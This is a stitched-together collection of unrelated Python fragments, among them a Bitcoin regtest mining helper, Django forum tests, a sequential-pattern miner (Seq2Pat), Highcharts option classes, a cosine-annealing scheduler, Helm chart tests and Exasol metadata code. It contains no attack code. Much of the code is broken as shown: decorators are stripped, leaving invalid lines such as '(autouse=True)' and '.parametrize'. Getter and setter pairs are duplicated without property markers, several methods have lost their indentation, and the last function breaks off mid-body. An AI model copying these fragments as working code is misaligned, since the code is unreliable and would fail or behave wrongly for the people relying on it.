    rpc_request = json.dumps({'jsonrpc': '2.0', 'method': 'generatetoaddress', 'params': [nblocks, address], 'id': 0})
    response = requests.post(BITCOIN_NODE_URI, data=rpc_request)
    response.raise_for_status()
    mined_hashes = []
    for mined_hash in response.json()['result']:
        mined_hashes.append(mined_hash)
        logger.debug('newly mined blockhash: %s', mined_hash)
    logger.debug("mined %s new blocks (funds to address=%s). use the 'regtest_topup_account' method to fund your account", nblocks, address)
    return mined_hashes
class TestTopicSubscriptionListView(BaseClientTestCase):
    """Tests for the forum member topic-subscriptions list view.

    NOTE(review): the bare ``(autouse=True)`` line below looks like the
    argument list of a stripped ``@pytest.fixture(autouse=True)`` decorator;
    as written it is not valid Python — confirm against the original source.
    """
    (autouse=True)
    def setup(self):
        # Two users sharing one group so permissions apply to both.
        self.u1 = UserFactory.create()
        self.g1 = GroupFactory.create()
        self.u1.groups.add(self.g1)
        self.user.groups.add(self.g1)
        self.perm_handler = PermissionHandler()
        # One top-level category with three forums under it.
        self.top_level_cat_1 = create_category_forum()
        self.forum_1 = create_forum(parent=self.top_level_cat_1)
        self.forum_2 = create_forum(parent=self.top_level_cat_1)
        self.forum_3 = create_forum(parent=self.top_level_cat_1)
        # Four topics with posts from both users.
        self.topic_1 = create_topic(forum=self.forum_2, poster=self.u1)
        PostFactory.create(topic=self.topic_1, poster=self.u1)
        PostFactory.create(topic=self.topic_1, poster=self.user)
        self.topic_2 = create_topic(forum=self.forum_1, poster=self.user)
        PostFactory.create(topic=self.topic_2, poster=self.user)
        PostFactory.create(topic=self.topic_2, poster=self.u1)
        self.topic_3 = create_topic(forum=self.forum_2, poster=self.u1)
        PostFactory.create(topic=self.topic_3, poster=self.u1)
        self.topic_4 = create_topic(forum=self.forum_2, poster=self.user)
        PostFactory.create(topic=self.topic_4, poster=self.user)
        # Grant read permission on the category and two of the forums.
        assign_perm('can_read_forum', self.g1, self.top_level_cat_1)
        assign_perm('can_read_forum', self.g1, self.forum_1)
        assign_perm('can_read_forum', self.g1, self.forum_2)
    def test_browsing_works(self):
        correct_url = reverse('forum_member:user_subscriptions')
        response = self.client.get(correct_url, follow=True)
        assert (response.status_code == 200)
    def test_cannot_be_browsed_by_anonymous_users(self):
        # Anonymous access must redirect (to the login page).
        correct_url = reverse('forum_member:user_subscriptions')
        self.client.logout()
        response = self.client.get(correct_url, follow=False)
        assert (response.status_code == 302)
    def test_displays_only_topics_the_user_is_subscribed_to(self):
        self.user.topic_subscriptions.add(self.topic_2)
        correct_url = reverse('forum_member:user_subscriptions')
        response = self.client.get(correct_url, follow=True)
        assert (response.status_code == 200)
        assert (list(response.context_data['topics']) == [self.topic_2]) |
class Seq2Pat():
    def __init__(self, sequences: List[list], max_span: Optional[int]=10, batch_size=None, discount_factor=0.2, n_jobs=2, seed=_Constants.default_seed):
        """Sequential pattern miner over a list of sequences.

        sequences: the rows to mine; items are either all strings or all numbers.
        max_span: maximum pattern width, enforced via an implicit index-span
            constraint (None disables it).
        batch_size / discount_factor / n_jobs / seed: batched-mining controls.
        """
        validate_sequences(sequences)
        validate_max_span(max_span)
        validate_batch_args(batch_size, discount_factor, n_jobs, seed)
        self._sequences: List[list] = sequences
        # String items are mapped to ints for the miner and mapped back when
        # patterns are returned.  (``self.sequences`` is used attribute-style
        # throughout this class, which suggests the ``sequences`` accessor
        # below lost a ``@property`` decorator in extraction — confirm.)
        self._is_string = isinstance(sequences[0][0], str)
        if self._is_string:
            (self._str_to_int, self._int_to_str) = item_map(self.sequences)
            self._sequences = string_to_int(self._str_to_int, self.sequences)
        self._num_rows = len(self.sequences)
        self._max_num_columns = get_max_column_size(self.sequences)
        self._max_value = get_max_value(self.sequences)
        # Constraint registry: attribute -> {constraint class name -> constraint}.
        self.attr_to_cts: Dict[(Attribute, Dict[(str, _Constraint)])] = dict()
        self._cython_imp = None
        if max_span:
            # Implicit span constraint over event indices caps pattern width.
            # NOTE(review): the chained comparison relies on Attribute's
            # operator overloading — presumably both bounds are captured;
            # confirm against the constraint implementation.
            index_attr = Attribute([[i for i in range(len(seq))] for seq in sequences])
            self.add_constraint((1 <= index_attr.span() <= (max_span - 1)))
        # Batched mining kicks in automatically for large inputs.
        if ((not batch_size) and (self._num_rows > _Constants.dynamic_batch_threshold)):
            self.batch_size = _Constants.default_batch_size
        else:
            self.batch_size = batch_size
        self.discount_factor = discount_factor
        self.n_jobs = n_jobs
        self.seed = seed
        self._rng = np.random.default_rng(self.seed)
    def sequences(self) -> List[List]:
        # Accessor for the (possibly int-mapped) input sequences.
        # NOTE(review): referenced as ``self.sequences`` (no call) throughout
        # the class, so this was almost certainly decorated with ``@property``
        # before extraction — confirm against the original source.
        return self._sequences
def add_constraint(self, constraint: _BaseConstraint) -> _BaseConstraint:
attr_id = constraint.attribute
ct_id = constraint.__class__.__name__
if (attr_id not in self.attr_to_cts):
self.attr_to_cts[attr_id] = dict()
if (ct_id in self.attr_to_cts[attr_id]):
raise TypeError((ct_id + ' constraint is already defined on this attribute.'))
check_true(check_sequence_feature_same_length(self.sequences, constraint.attribute.values), ValueError('Each sequence should match given attributes in event length.'))
self.attr_to_cts[attr_id][ct_id] = constraint
return constraint
def remove_constraint(self, constraint: _BaseConstraint) -> NoReturn:
attribute_id = constraint.attribute
constraint_id = constraint.__class__.__name__
try:
del self.attr_to_cts[attribute_id][constraint_id]
if (len(self.attr_to_cts[attribute_id]) == 0):
del self.attr_to_cts[attribute_id]
except KeyError:
raise KeyError((('No ' + constraint_id) + ' constraint to remove on this attribute.'))
def _run_thread(self, min_frequency, q):
self._cython_imp = self._get_cython_imp(min_frequency)
q.put(self._cython_imp.mine())
def get_patterns(self, min_frequency: Num) -> List[list]:
check_true((self._num_rows >= 1), ValueError('Sequences should not be empty.'))
validate_min_frequency(self._num_rows, min_frequency)
if (not self.batch_size):
q = Queue()
thread = Process(target=self._run_thread, args=(min_frequency, q))
thread.start()
patterns = q.get()
thread.join()
else:
if isinstance(min_frequency, int):
min_frequency = (float(min_frequency) / len(self.sequences))
patterns = self._get_patterns_batch(min_frequency)
if self._is_string:
patterns = int_to_string(self._int_to_str, patterns)
patterns_sorted = sort_pattern(patterns)
gc.collect()
return patterns_sorted
def _get_patterns_batch(self, min_frequency: float) -> List[list]:
(sequences, attr_to_cs) = self._shuffle_data()
n_sequences = len(sequences)
num_chunks = (n_sequences // self.batch_size)
if ((n_sequences % self.batch_size) > 0):
num_chunks += 1
batch_patterns = Parallel(n_jobs=self.n_jobs, require='sharedmem')((delayed(self._mining_batch)(i, sequences, attr_to_cs, min_frequency) for i in range(0, num_chunks)))
min_row_count = int((n_sequences * min_frequency))
agg_patterns = aggregate_patterns(batch_patterns, min_row_count)
return agg_patterns
def _shuffle_data(self) -> Tuple[(List[List], Dict[(Attribute, Dict[(str, _Constraint)])])]:
indices = list(range(len(self.sequences)))
self._rng.shuffle(indices)
shuffled_sequences = [self.sequences[i] for i in indices]
shuffled_attr_to_cts = deepcopy(self.attr_to_cts)
for attr in shuffled_attr_to_cts:
for cs in shuffled_attr_to_cts[attr]:
old_constraint = shuffled_attr_to_cts[attr][cs]
new_constraint = deepcopy(old_constraint)
shuffled_values = [old_constraint.attribute.values[i] for i in indices]
new_constraint.attribute._set_values(shuffled_values)
shuffled_attr_to_cts[attr][cs] = new_constraint
return (shuffled_sequences, shuffled_attr_to_cts)
def _mining_batch(self, chunk_ind: int, sequences: List[List], attr_to_cs: Dict[(Attribute, Dict[(str, _Constraint)])], min_frequency: float) -> List[List]:
batch_sequences = sequences[(chunk_ind * self.batch_size):((chunk_ind + 1) * self.batch_size)]
batch_seq2pat = Seq2Pat(batch_sequences, max_span=None, batch_size=None)
for attr in attr_to_cs:
for cs in attr_to_cs[attr]:
old_constraint = attr_to_cs[attr][cs]
new_constraint = deepcopy(old_constraint)
new_constraint.attribute._set_values(old_constraint.attribute.values[(chunk_ind * self.batch_size):((chunk_ind + 1) * self.batch_size)])
batch_seq2pat.add_constraint(new_constraint)
adjusted_min_frequency = update_min_frequency(len(batch_sequences), min_frequency, self.discount_factor)
return batch_seq2pat.get_patterns(adjusted_min_frequency)
def _get_cython_imp(self, min_frequency) -> stp.PySeq2pat:
    """Marshal sequences, attributes and constraints into the Cython solver.

    Populates a flat parameter dictionary (bound lists, per-attribute index
    lists and counters keyed by `_Constants`) from every registered
    constraint, copies the parameters onto a `PySeq2pat` instance, and sets
    the frequency threshold `theta`.

    A float `min_frequency` <= 1.0 is interpreted as a fraction of the number
    of rows; any other value is used as an absolute row count.
    """
    cython_imp = stp.PySeq2pat()
    # Flat parameter layout expected by the Cython backend: per-constraint
    # bound lists, attribute-index lists, per-attribute counters, and the
    # raw sequence/attribute data plus dimensions (M columns, N rows, L max value).
    params = {_Constants.lgap: [], _Constants.ugap: [], _Constants.lavr: [], _Constants.uavr: [], _Constants.lspn: [], _Constants.uspn: [], _Constants.lmed: [], _Constants.umed: [], _Constants.ugapi: [], _Constants.lgapi: [], _Constants.uspni: [], _Constants.lspni: [], _Constants.uavri: [], _Constants.lavri: [], _Constants.umedi: [], _Constants.lmedi: [], _Constants.num_minmax: [], _Constants.num_avr: [], _Constants.num_med: [], _Constants.tot_gap: [], _Constants.tot_spn: [], _Constants.tot_avr: [], _Constants.num_att: 0, _Constants.items: self.sequences, _Constants.attrs: [], _Constants.M: self._max_num_columns, _Constants.N: self._num_rows, _Constants.L: self._max_value, _Constants.max_attrs: [], _Constants.min_attrs: []}
    for (attribute, constraints) in self.attr_to_cts.items():
        # Register the attribute itself; per-attribute counters start at 0.
        params[_Constants.num_att] += 1
        params[_Constants.num_minmax].append(0)
        params[_Constants.num_avr].append(0)
        params[_Constants.num_med].append(0)
        params[_Constants.max_attrs].append(attribute._max)
        params[_Constants.min_attrs].append(attribute._min)
        params[_Constants.attrs].append(attribute.values)
        # Dispatch each constraint to the matching parameter updater.
        for (constraint_type, constraint) in constraints.items():
            if isinstance(constraint, _Constraint.Average):
                self._update_average_params(params, constraint)
            if isinstance(constraint, _Constraint.Gap):
                self._update_gap_params(params, constraint)
            if isinstance(constraint, _Constraint.Median):
                self._update_median_params(params, constraint)
            if isinstance(constraint, _Constraint.Span):
                self._update_span_params(params, constraint)
    # Copy every collected parameter onto the Cython object attribute-by-attribute.
    for (constraint, value) in params.items():
        setattr(cython_imp, constraint, value)
    if (isinstance(min_frequency, float) and (min_frequency <= 1.0)):
        # Fractional frequency: convert to an absolute row count.
        cython_imp.theta = (cython_imp.N * min_frequency)
    else:
        cython_imp.theta = min_frequency
    return cython_imp
def _update_average_params(params: dict, constraint: _Constraint.Average) -> NoReturn:
    """Record an Average constraint's bounds in the solver parameter dict.

    Mutates ``params`` in place: appends the owning attribute's zero-based
    index to ``tot_avr`` and, for each bound that is present, the bound
    value, its attribute index, and a bump of the last ``num_avr`` counter.

    NOTE(review): defined without ``self`` yet called as
    ``self._update_average_params(...)`` above — presumably a
    ``@staticmethod`` whose decorator is not visible in this view; confirm
    against the original file.
    """
    # num_att was already incremented for this attribute, hence the -1.
    att_id = (params[_Constants.num_att] - 1)
    params[_Constants.tot_avr].append(att_id)
    if constraint.has_lower_bound():
        params[_Constants.lavr].append(constraint.lower_bound)
        params[_Constants.lavri].append(att_id)
        params[_Constants.num_avr][(- 1)] += 1
    if constraint.has_upper_bound():
        params[_Constants.uavr].append(constraint.upper_bound)
        params[_Constants.uavri].append(att_id)
        params[_Constants.num_avr][(- 1)] += 1
def _update_gap_params(params: dict, constraint: _Constraint.Gap) -> NoReturn:
    """Record a Gap constraint's bounds in the solver parameter dict.

    Mutates ``params`` in place: appends the owning attribute's zero-based
    index to ``tot_gap`` and, per present bound, the bound value and its
    attribute index.
    """
    attribute_index = params[_Constants.num_att] - 1
    params[_Constants.tot_gap].append(attribute_index)
    if constraint.has_lower_bound():
        params[_Constants.lgap].append(constraint.lower_bound)
        params[_Constants.lgapi].append(attribute_index)
    if constraint.has_upper_bound():
        params[_Constants.ugap].append(constraint.upper_bound)
        params[_Constants.ugapi].append(attribute_index)
def _update_median_params(params: dict, constraint: _Constraint.Median) -> NoReturn:
    """Record a Median constraint's bounds in the solver parameter dict.

    Mutates ``params`` in place. Unlike average/gap/span there is no
    ``tot_med`` list in the parameter layout, so only the bound values,
    their attribute indices, and the ``num_med`` counter are updated.
    """
    # num_att was already incremented for this attribute, hence the -1.
    att_id = (params[_Constants.num_att] - 1)
    if constraint.has_lower_bound():
        params[_Constants.lmed].append(constraint.lower_bound)
        params[_Constants.lmedi].append(att_id)
        params[_Constants.num_med][(- 1)] += 1
    if constraint.has_upper_bound():
        params[_Constants.umed].append(constraint.upper_bound)
        params[_Constants.umedi].append(att_id)
        params[_Constants.num_med][(- 1)] += 1
def _update_span_params(params: dict, constraint: _Constraint.Span) -> NoReturn:
    """Record a Span constraint's bounds in the solver parameter dict.

    Mutates ``params`` in place: appends the owning attribute's zero-based
    index to ``tot_spn`` and, per present bound, the bound value and index.

    NOTE(review): only the lower bound adds 2 to ``num_minmax`` and the
    upper bound adds nothing — cannot confirm from this view whether that
    asymmetry is intentional solver bookkeeping; verify upstream.
    """
    att_id = (params[_Constants.num_att] - 1)
    params[_Constants.tot_spn].append(att_id)
    if constraint.has_lower_bound():
        params[_Constants.lspn].append(constraint.lower_bound)
        params[_Constants.lspni].append(att_id)
        params[_Constants.num_minmax][(- 1)] += 2
    if constraint.has_upper_bound():
        params[_Constants.uspn].append(constraint.upper_bound)
        params[_Constants.uspni].append(att_id)
def __str__(self) -> str:
str = '\n\nSeq2Pat'
for (attribute, constraints) in self.attr_to_cts.items():
str += ('\nConstraints of Attribute: ' + repr(attribute))
str += ('\nConstraints: ' + repr(constraints))
for (constraint_type, constraint) in constraints.items():
str += ((('\nConstraint: ' + constraint_type) + ' ') + repr(constraint))
str += ('\nLB: ' + repr(constraint.lower_bound))
str += ('\nUB: ' + repr(constraint.upper_bound))
return str |
def test_add_code_node():
    """Adding code nodes must register them as forest roots while leaving
    the shared condition handler unchanged.
    """
    asforest = AbstractSyntaxForest(condition_handler=ConditionHandler())
    first_node = asforest.factory.create_code_node([])
    asforest.add_code_node(first_node)
    assert len(asforest) == 2
    assert set(asforest.get_roots) == {first_node, asforest._current_root}
    second_node = CodeNode(
        [Assignment(var('a'), const(2)), Assignment(var('b'), const(5))],
        asforest.condition_handler.get_true_value(),
    )
    asforest.add_code_node(second_node)
    assert len(asforest) == 3
    assert asforest.condition_handler == ConditionHandler()
    assert set(asforest.get_roots) == {first_node, second_node, asforest._current_root}
class _MenuItem(HasTraits):
    """Traits wrapper binding a menu-item description to a toolkit control.

    Holds the item's UI state as traits and, when a controller is supplied,
    registers itself with it so the controller can manage the item.
    """
    # Whether the menu item is checked.
    checked = Bool(False)
    # Optional controller object that manages this item.
    controller = Any()
    # Whether the menu item is enabled.
    enabled = Bool(True)
    # Whether the menu item is visible.
    visible = Bool(True)
    # Radio-group identifier, if the item belongs to one.
    group = Any()
    def __init__(self, parent, menu, item, controller):
        """Wrap *item* and register with *controller* when one is given.

        NOTE(review): ``parent`` and ``menu`` are accepted but not stored in
        the code visible here; ``control_id`` is fixed at 1 and ``control``
        starts unset — confirm against the full class for their use.
        """
        self.item = item
        self.control_id = 1
        self.control = None
        if (controller is not None):
            # Assigning the trait before registration so the controller sees it.
            self.controller = controller
            controller.add_to_menu(self)
def source_folder():
    """Fixture: build a temporary source tree (one root file plus one nested
    file), yield the source directory path, then remove everything.
    """
    scratch_root = tempfile.mkdtemp()
    # Trailing '' keeps the path ending with a separator, as callers expect.
    src_dir = os.path.join(scratch_root, 'source', '')
    nested_dir = os.path.join(src_dir, 'nested')
    local.mkdir(nested_dir)
    original_path = os.path.join(src_dir, 'original.txt')
    local.touch(original_path)
    with open(original_path, 'w') as handle:
        handle.write('hello original')
    local.touch(os.path.join(nested_dir, 'more.txt'))
    yield src_dir
    shutil.rmtree(scratch_root)
class PreviewHandler(Handler):
    """Staff-only page preview handler.

    Resolves the page by primary key and serves it at its canonical URL
    with all caching disabled, so editors always see fresh content.
    """
    def get_object(self):
        """Fetch the page by pk (second URL argument) and rewrite the
        request path to the page's canonical URL before rendering."""
        page = get_object_or_404(self.page_model, pk=self.args[1])
        # Downstream rendering uses request.path, so point it at the real URL.
        self.request.path = page.get_absolute_url()
        return page
    def handler(self, request, *args, **kwargs):
        """Serve the preview; 404 for non-staff users, never cached."""
        if (not request.user.is_staff):
            # 404 rather than 403 to avoid revealing the page's existence.
            raise Http404('Not found (not allowed)')
        response = super().handler(request, *args, **kwargs)
        response['Cache-Control'] = 'no-cache, must-revalidate, no-store, private'
        return response
def test_pod_security_policy():
    """RBAC/PSP objects must be absent with default values and fully
    rendered (role rules, binding, service account wiring) when both
    ``rbac.create`` and ``podSecurityPolicy.create`` are enabled."""
    config = ''
    resources = ('role', 'rolebinding', 'serviceaccount', 'podsecuritypolicy')
    r = helm_template(config)
    # Default chart values: no RBAC resources, no serviceAccountName injected.
    for resource in resources:
        assert (resource not in r)
    assert ('serviceAccountName' not in r['statefulset'][uname]['spec']['template']['spec'])
    config = '\nrbac:\n create: true\n serviceAccountName: ""\n\npodSecurityPolicy:\n create: true\n name: ""\n'
    r = helm_template(config)
    # With creation enabled every RBAC/PSP resource must be rendered.
    for resource in resources:
        assert (resource in r)
    # Role must grant 'use' on exactly the chart-named PSP.
    assert (r['role'][uname]['rules'][0] == {'apiGroups': ['extensions'], 'verbs': ['use'], 'resources': ['podsecuritypolicies'], 'resourceNames': [uname]})
    assert (r['rolebinding'][uname]['subjects'] == [{'kind': 'ServiceAccount', 'namespace': 'default', 'name': uname}])
    assert (r['rolebinding'][uname]['roleRef'] == {'apiGroup': 'rbac.authorization.k8s.io', 'kind': 'Role', 'name': uname})
    assert (r['statefulset'][uname]['spec']['template']['spec']['serviceAccountName'] == uname)
    psp_spec = r['podsecuritypolicy'][uname]['spec']
    assert (psp_spec['privileged'] is True)
class OptionSeriesAreaSonificationDefaultspeechoptionsMappingTime(Options):
    """Config proxy for ``series.area.sonification.defaultSpeechOptions.mapping.time``.

    NOTE(review): each name appears twice (getter then setter); the
    ``@property`` / ``@<name>.setter`` decorators are presumably stripped in
    this view — confirm against the generated original.
    """
    def mapFunction(self):
        """Getter: mapping function for the time value (default None)."""
        return self._config_get(None)
    def mapFunction(self, value: Any):
        """Setter: mapping function for the time value."""
        self._config(value, js_type=False)
    def mapTo(self):
        """Getter: point property to map time to (default None)."""
        return self._config_get(None)
    def mapTo(self, text: str):
        """Setter: point property to map time to."""
        self._config(text, js_type=False)
    def max(self):
        """Getter: maximum mapped time value (default None)."""
        return self._config_get(None)
    def max(self, num: float):
        """Setter: maximum mapped time value."""
        self._config(num, js_type=False)
    def min(self):
        """Getter: minimum mapped time value (default None)."""
        return self._config_get(None)
    def min(self, num: float):
        """Setter: minimum mapped time value."""
        self._config(num, js_type=False)
    def within(self):
        """Getter: range the mapping is computed within (default None)."""
        return self._config_get(None)
    def within(self, value: Any):
        """Setter: range the mapping is computed within."""
        self._config(value, js_type=False)
def character_aware_vertical_mirror(art: str) -> str:
    """Mirror ASCII art vertically (top-to-bottom).

    Lines are reversed top to bottom and each character is swapped for its
    vertical-mirror counterpart from ``vmirror_character_alternatives`` when
    one exists (characters without an alternative pass through unchanged).

    Args:
        art: Multi-line ASCII-art string.

    Returns:
        The vertically mirrored art; no trailing newline is introduced.
    """
    mirrored_lines = []
    for line in reversed(art.split('\n')):
        # dict.get with the char itself as default replaces the
        # `char in d.keys()` membership-test anti-idiom.
        mirrored_lines.append(''.join(vmirror_character_alternatives.get(char, char) for char in line))
    # join() replaces the append-'\n'-then-strip-last-char dance; output is
    # identical, including the empty-input case.
    return '\n'.join(mirrored_lines)
class DatasetCorrelation(MetricResult):
    """Metric result holding pairwise correlation matrices and their stats."""
    class Config():
        # The heavy DataFrame payloads are excluded from dict/DataFrame exports.
        dict_exclude_fields = {'correlation', 'correlations_calculate'}
        pd_exclude_fields = {'correlation', 'correlations_calculate'}
    # Correlation matrices keyed by method name (e.g. 'pearson').
    correlation: Dict[(str, pd.DataFrame)]
    # Aggregate statistics per correlation method.
    stats: Dict[(str, CorrelationStats)]
    # Presumably the subset of matrices actually computed this run — TODO confirm.
    correlations_calculate: Optional[Dict[(str, pd.DataFrame)]]
class AuditCategoryRelation(db.Model):
    """ORM mapping of audit-finding primary categories to sub-categories.

    Backed by the ``auditsearch.finding_rel_vw`` database view; the
    composite primary key is (primary_category_id, sub_category_id).
    """
    __table_args__ = {'schema': 'auditsearch'}
    __tablename__ = 'finding_rel_vw'
    primary_category_id = db.Column(db.String, index=True, primary_key=True, doc=docs.PRIMARY_CATEGORY_ID)
    primary_category_name = db.Column(db.String, doc=docs.PRIMARY_CATEGORY_NAME)
    sub_category_id = db.Column(db.String, index=True, primary_key=True, doc=docs.SUB_CATEGORY_ID)
    sub_category_name = db.Column(db.String, index=True, doc=docs.SUB_CATEGORY_NAME)
def get_cosineannealing_scheduler_with_warmup(optimizer: torch.optim.Optimizer, max_epochs: int=12, warmup_epochs: float=0.1):
    """Build a SequentialLR: linear warmup then cosine annealing.

    Warmup lasts ``int(warmup_epochs * max_epochs)`` epochs (at least 1),
    ramping the LR from 1% to 100% of its base value; the remaining epochs
    decay with cosine annealing.

    Args:
        optimizer: Optimizer whose learning rate is scheduled.
        max_epochs: Total number of scheduled epochs.
        warmup_epochs: Warmup duration as a fraction of ``max_epochs``.

    Returns:
        A ``torch.optim.lr_scheduler.SequentialLR`` to be stepped once per epoch.
    """
    # Fixed: was max(1.0, int(...)), which could produce a float milestone /
    # total_iters; epoch counts are kept as ints throughout.
    warmup_milestone_epoch = max(1, int(warmup_epochs * max_epochs))
    warmup_scheduler = torch.optim.lr_scheduler.LinearLR(
        optimizer, start_factor=0.01, end_factor=1.0, total_iters=warmup_milestone_epoch)
    cosineannealing_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
        optimizer, T_max=(max_epochs - warmup_milestone_epoch))
    scheduler = torch.optim.lr_scheduler.SequentialLR(
        optimizer, [warmup_scheduler, cosineannealing_scheduler], milestones=[warmup_milestone_epoch])
    return scheduler
# NOTE(review): decorator appears truncated in this view — presumably
# `@pytest.mark.parametrize`; confirm against the original file.
.parametrize('antialias', [True, False])
def test_project_grid_antialias(antialias):
    """Projected grids must record BlockReduce in metadata iff antialiasing
    was requested, keep regular spacing, and preserve data values."""
    shape = (50, 40)
    lats = np.linspace(2, 10, shape[1])
    lons = np.linspace((- 10), 2, shape[0])
    data = np.ones(shape, dtype='float')
    grid = xr.DataArray(data, coords=[lons, lats], dims=('latitude', 'longitude'))
    proj = project_grid(grid, projection, antialias=antialias)
    # Antialiasing is implemented via skimage BlockReduce and noted in metadata.
    if antialias:
        assert ('BlockReduce' in proj.attrs['metadata'])
    else:
        assert ('BlockReduce' not in proj.attrs['metadata'])
    assert (proj.dims == ('northing', 'easting'))
    assert (proj.name == 'scalars')
    assert (proj.shape == shape)
    # Projected coordinates must be evenly spaced along both axes.
    spacing_east = (proj.easting[1:] - proj.easting[0:(- 1)])
    npt.assert_allclose(spacing_east, spacing_east[0])
    spacing_north = (proj.northing[1:] - proj.northing[0:(- 1)])
    npt.assert_allclose(spacing_north, spacing_north[0])
    # All non-NaN projected values must still equal the input constant.
    npt.assert_allclose(proj.values[(~ np.isnan(proj.values))], 1)
class OptionPlotoptionsGaugeSonificationContexttracksMapping(Options):
    """Config proxy for ``plotOptions.gauge.sonification.contextTracks.mapping``.

    Most accessors expose nested sub-option objects; ``text`` follows the
    duplicated getter/setter pattern used throughout this generated module
    (NOTE(review): property/setter decorators are presumably stripped in
    this view — confirm against the generated original).
    """
    def frequency(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingFrequency':
        """Sub-options controlling frequency mapping."""
        return self._config_sub_data('frequency', OptionPlotoptionsGaugeSonificationContexttracksMappingFrequency)
    def gapBetweenNotes(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingGapbetweennotes':
        """Sub-options controlling the gap between notes."""
        return self._config_sub_data('gapBetweenNotes', OptionPlotoptionsGaugeSonificationContexttracksMappingGapbetweennotes)
    def highpass(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingHighpass':
        """Sub-options for the highpass filter mapping."""
        return self._config_sub_data('highpass', OptionPlotoptionsGaugeSonificationContexttracksMappingHighpass)
    def lowpass(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingLowpass':
        """Sub-options for the lowpass filter mapping."""
        return self._config_sub_data('lowpass', OptionPlotoptionsGaugeSonificationContexttracksMappingLowpass)
    def noteDuration(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingNoteduration':
        """Sub-options controlling note duration mapping."""
        return self._config_sub_data('noteDuration', OptionPlotoptionsGaugeSonificationContexttracksMappingNoteduration)
    def pan(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingPan':
        """Sub-options controlling stereo pan mapping."""
        return self._config_sub_data('pan', OptionPlotoptionsGaugeSonificationContexttracksMappingPan)
    def pitch(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingPitch':
        """Sub-options controlling pitch mapping."""
        return self._config_sub_data('pitch', OptionPlotoptionsGaugeSonificationContexttracksMappingPitch)
    def playDelay(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingPlaydelay':
        """Sub-options controlling play-delay mapping."""
        return self._config_sub_data('playDelay', OptionPlotoptionsGaugeSonificationContexttracksMappingPlaydelay)
    def rate(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingRate':
        """Sub-options controlling playback-rate mapping."""
        return self._config_sub_data('rate', OptionPlotoptionsGaugeSonificationContexttracksMappingRate)
    def text(self):
        """Getter: text announced for the track (default None)."""
        return self._config_get(None)
    def text(self, text: str):
        """Setter: text announced for the track."""
        self._config(text, js_type=False)
    def time(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingTime':
        """Sub-options controlling time mapping."""
        return self._config_sub_data('time', OptionPlotoptionsGaugeSonificationContexttracksMappingTime)
    def tremolo(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingTremolo':
        """Sub-options controlling tremolo mapping."""
        return self._config_sub_data('tremolo', OptionPlotoptionsGaugeSonificationContexttracksMappingTremolo)
    def volume(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingVolume':
        """Sub-options controlling volume mapping."""
        return self._config_sub_data('volume', OptionPlotoptionsGaugeSonificationContexttracksMappingVolume)
def test_config_dataclasses():
    """A dataclass instance placed inside a config must survive registry
    resolution unchanged (same type, same field values)."""
    cat = Cat('testcat', value_in=1, value_out=2)
    config = {'cfg': {'': 'catsie.v3', 'arg': cat}}
    resolved = my_registry.resolve(config)['cfg']
    assert isinstance(resolved, Cat)
    for field_name in ('name', 'value_in', 'value_out'):
        assert getattr(resolved, field_name) == getattr(cat, field_name)
class OptionSeriesVennSonificationContexttracksMappingLowpass(Options):
    """Config proxy for ``series.venn.sonification.contextTracks.mapping.lowpass``."""
    def frequency(self) -> 'OptionSeriesVennSonificationContexttracksMappingLowpassFrequency':
        """Sub-options controlling the lowpass cutoff frequency."""
        return self._config_sub_data('frequency', OptionSeriesVennSonificationContexttracksMappingLowpassFrequency)
    def resonance(self) -> 'OptionSeriesVennSonificationContexttracksMappingLowpassResonance':
        """Sub-options controlling the lowpass resonance."""
        return self._config_sub_data('resonance', OptionSeriesVennSonificationContexttracksMappingLowpassResonance)
class ExaMetaData(object):
    """Read-only metadata helpers for an Exasol connection.

    Existence checks and listings run either through the no-SQL metadata
    websocket commands (protocol v2+) or as snapshot-isolated queries
    against the ``sys.exa_*`` system views (older protocols).
    """
    # Hint prepended to metadata queries so they run with snapshot isolation
    # and do not block on concurrent transactions.
    snapshot_execution_hint = '/*snapshot execution*/'
    def __init__(self, connection):
        """Bind to *connection*; the SQL-keyword cache starts empty."""
        self.connection = connection
        self.sql_keywords = None
    def sql_columns(self, query, query_params=None):
        """Return the column metadata of *query* without executing it
        (prepare-only), closing the statement afterwards."""
        st = self.connection.cls_statement(self.connection, query, query_params, prepare=True)
        columns = st.columns()
        st.close()
        return columns
    def schema_exists(self, schema_name):
        """Return True if a schema with exactly *schema_name* exists."""
        object_name = self.connection.format.default_format_ident_value(schema_name)
        if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
            st = self.execute_meta_nosql('getSchemas', {'schema': object_name})
        else:
            st = self.execute_snapshot('\n SELECT 1\n FROM sys.exa_schemas\n WHERE schema_name={object_name}\n ', {'object_name': object_name})
        return (st.rowcount() > 0)
    def table_exists(self, table_name):
        """Return True if the table exists.

        *table_name* may be a plain name (resolved against the current
        schema) or a ``(schema, table)`` tuple.
        """
        if isinstance(table_name, tuple):
            object_schema = self.connection.format.default_format_ident_value(table_name[0])
            object_name = self.connection.format.default_format_ident_value(table_name[1])
        else:
            object_schema = self.connection.current_schema()
            object_name = self.connection.format.default_format_ident_value(table_name)
        if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
            st = self.execute_meta_nosql('getTables', {'schema': object_schema, 'table': object_name, 'tableTypes': ['TABLE']})
        else:
            st = self.execute_snapshot('\n SELECT 1\n FROM sys.exa_all_tables\n WHERE table_schema={object_schema}\n AND table_name={object_name}\n ', {'object_schema': object_schema, 'object_name': object_name})
        return (st.rowcount() > 0)
    def view_exists(self, view_name):
        """Return True if the view exists.

        *view_name* may be a plain name (resolved against the current
        schema) or a ``(schema, view)`` tuple.
        """
        if isinstance(view_name, tuple):
            object_schema = self.connection.format.default_format_ident_value(view_name[0])
            object_name = self.connection.format.default_format_ident_value(view_name[1])
        else:
            object_schema = self.connection.current_schema()
            object_name = self.connection.format.default_format_ident_value(view_name)
        if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
